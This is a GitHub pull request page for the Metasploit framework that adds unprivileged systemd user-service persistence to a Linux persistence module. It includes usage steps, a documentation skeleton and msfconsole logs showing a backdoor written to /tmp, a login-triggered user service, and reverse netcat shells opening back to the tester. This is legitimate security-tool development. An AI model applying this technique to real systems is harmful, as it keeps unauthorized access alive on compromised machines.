Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add systemd unprivileged user persistence #11419

Merged
merged 10 commits into from Mar 6, 2019

Conversation

Projects
None yet
5 participants
@terrorbyte
Copy link
Contributor

terrorbyte commented Feb 15, 2019

These changes add a new target to the Linux service persistence for "systemd user", which (if supported) will invoke systemctl --user which allows non-administrative users to run service files.

At the moment I only implimented the functionality to match the original systemd persistence features, but realistically it is possible to enforce different mechanisms for things like user logins, logouts, and a pile more as documented in systemd.unit(5). I have a small write up from ages ago that has some more sophisticated examples.

It should be noted that a couple of things I noticed, SHELLPATH should probably change when the target is selected as the default is expecting a administrative user with access to /usr/local/bin. Additionally, the behavior of enabling a service without any option to disable it freaked me out a bit, so I added that as an advanced option.

msf5 exploit(linux/local/service_persistence) > show options

Module options (exploit/linux/local/service_persistence):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SERVICE                      no        Name of service to create
   SESSION     1                yes       The session to run this module on.
   SHELLPATH   /tmp             yes       Writable path to put our shell
   SHELL_NAME                   no        Name of shell file to write


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   systemd user


msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 1
5:45:16 -0500

id
uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres)
exit
[*] 127.0.0.1 - Command shell session 2 closed.
msf5 exploit(linux/local/service_persistence) > set VERBOSE true
VERBOSE => true
msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Writing backdoor to /tmp/iEucd
[*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: uKxHqmV
[*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 1
5:45:30 -0500

echo hi lennart
hi lennart
exit
[*] 127.0.0.1 - Command shell session 3 closed.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Execute a meterpreter shell on your Linux target and get a session
  • use linux/local/service_persistence
  • set SESSION 1
  • set TARGET 4 - for systemd user targets
  • set SHELLPATH /tmp - The rest of the targets expect a administratively writable directory
  • use PAYLOAD cmd/unix/reverse_netcat
  • set appropriate LHOST and LPORT
  • (optionally) set ENABLE false
  • execute
Added systemd lower privlege service persistence
Update the module to support systemd --user as a target for the
service_persistence module. This creates a file in a set of "supported"
local directories and triggers the systemctl calls with --user. The unit
files in question can be seen documented in systemd.unit(5)
@terrorbyte

This comment has been minimized.

Copy link
Contributor Author

terrorbyte commented Feb 15, 2019

Some other notes:

  • It should be documented that ENABLE'd user services will actually execute on each user login as apposed to system reboot. This logic can actually be flipped to execute when users log out and if this PR makes it I'll add that in a bit later
  • I do believe that I may have forgot the part of my patch to check if the systemd user directories actually exist, if a test fails on that case I will add some mkdir logic (realistically I think that this should be part of the core library and have been working on adding it)
  • This is my first PR (despite working at R7 lol: @cblack-r7 ) so if I did something stupid just tell me.

@wvu-r7 wvu-r7 self-assigned this Feb 19, 2019

terrorbyte added some commits Feb 20, 2019

@bcoles bcoles added the delayed label Feb 26, 2019

@bcoles bcoles removed the delayed label Mar 1, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Mar 1, 2019

Please add some module documentation for this module.

Here's a skeleton.

## Description

  This module will create a service on the box, and mark it for auto-restart.
  We need enough access to write service files and potentially restart services.


## Vulnerable Application

  Targets:
    System V:
      CentOS <= 5
      Debian <= 6
      Kali 2.0
      Ubuntu <= 9.04
    Upstart:
      CentOS 6
      Fedora >= 9, < 15
      Ubuntu >= 9.10, <= 14.10
    systemd:
      CentOS 7
      Debian >= 7, <=8
      Fedora >= 15
      Ubuntu >= 15.04

  Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/linux/local/service_persistence`
  4. Do: `set SESSION [SESSION]`
  5. Do: `check`
  6. Do: `run`
  7. You should get a new session


## Options

**SHELLPATH**

Writable path to put our shell (default: `/usr/local/bin`)

**SHELL_NAME**

Name of shell file to write.

**SERVICE**

Name of service to create.


## Scenarios

### systemd unprivileged user persistence

<your msf console output>
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 6, 2019

I am working on this now that I've cleared Wemo and Drupal.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 6, 2019

msf5 exploit(linux/local/service_persistence) > options

Module options (exploit/linux/local/service_persistence):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SERVICE                      no        Name of service to create
   SESSION     -1               yes       The session to run this module on.
   SHELLPATH   /tmp             yes       Writable path to put our shell
   SHELL_NAME                   no        Name of shell file to write


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   systemd user


msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Writing backdoor to /tmp/PPpCF
[*] Max line length is 65537
[*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
[*] Creating user service directory
[*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
[*] Max line length is 65537
[*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: OzzdRBC
[*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600

id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

@wvu-r7 wvu-r7 added enhancement and removed needs-docs labels Mar 6, 2019

wvu-r7 added some commits Mar 6, 2019

@wvu-r7 wvu-r7 merged commit ebb80ae into rapid7:master Mar 6, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request Mar 6, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 6, 2019

Release Notes

This adds systemd user-level service persistence to the linux/local/service_persistence exploit module.

msjenkins-r7 added a commit that referenced this pull request Mar 6, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.